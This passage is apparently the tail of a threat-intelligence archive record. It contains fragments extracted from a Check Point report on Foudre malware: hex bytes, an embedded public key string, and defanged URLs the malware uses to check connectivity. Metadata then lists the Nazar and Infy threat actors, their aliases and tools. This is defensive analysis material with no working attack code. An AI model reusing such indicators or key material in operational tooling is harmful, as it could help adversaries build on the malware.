F3 FD E8 B1 A5\r\n4A C8 DA 4B 74 99 F8 29 47 0C 5E E4 EC 9F DD AD 
FA 38 11 BB 2C 14 A9 C4 CE B5 FF 8A 5F DC 56 71 01 47 D9 58\r\n43 75 3C 3B C4 F1 9C 5F 0B 47 0F 62 63 84 CC CB 2A 52 1C B2 B2 0E A1 02 CD F1 6A 4E 37 9E 88 C5 ED FE E1 1F\r\n47 84 8F C8 63 0B 24 69 8F 03 00 00 00 01 00 01\r\nFoudre 20 embedded public key\r\nWoerfulTgpMb2NrQm94MwEAAAADAAEAABXerthNt8KS196wHV642+QKKJC26QULYOEd+Qqu6m0VBNHVBWpQ0cROPgOoKU4ibJR9ZntJGJbBUdW+8ykxY2iB7WNay98Y+O1IvGgP+\r\nChecking connectivity and current date\r\nwww.msn[.]com\r\nwww.breakingnews[.]com/feeds/rss\r\nwww.france24[.]com/en/top-stories/rss/\r\nSource: https://research.checkpoint.com/2021/after-lightning-comes-thunder/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2021/after-lightning-comes-thunder/"
	],
	"report_names": [
		"after-lightning-comes-thunder"
	],
	"threat_actors": [
		{
			"id": "bf773c52-830b-46e3-aa61-58c82eb323ee",
			"created_at": "2023-01-06T13:46:39.135077Z",
			"updated_at": "2026-04-10T02:00:03.226187Z",
			"deleted_at": null,
			"main_name": "Nazar",
			"aliases": [
				"SIG37"
			],
			"source_name": "MISPGALAXY:Nazar",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f3b19931-3751-4ece-a235-15b397951dc2",
			"created_at": "2022-10-25T16:07:23.889537Z",
			"updated_at": "2026-04-10T02:00:04.780137Z",
			"deleted_at": null,
			"main_name": "Nazar",
			"aliases": [
				"SIG37"
			],
			"source_name": "ETDA:Nazar",
			"tools": [
				"Distribute.exe",
				"EYService",
				"GpUpdates.exe",
				"Microolap Packet Sniffer",
				"TCPDUMP for Windows"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1",
			"created_at": "2023-01-06T13:46:38.561288Z",
			"updated_at": "2026-04-10T02:00:03.024326Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"Operation Mermaid",
				"Prince of Persia",
				"Foudre"
			],
			"source_name": "MISPGALAXY:Infy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39",
			"created_at": "2022-10-25T16:07:23.734244Z",
			"updated_at": "2026-04-10T02:00:04.731031Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"APT-C-07",
				"Infy",
				"Operation Mermaid",
				"Prince of Persia"
			],
			"source_name": "ETDA:Infy",
			"tools": [
				"Foudre",
				"Infy",
				"Tonnerre"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434665,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82.pdf",
		"text": "https://archive.orkl.eu/6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82.txt",
		"img": "https://archive.orkl.eu/6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82.jpg"
	}
}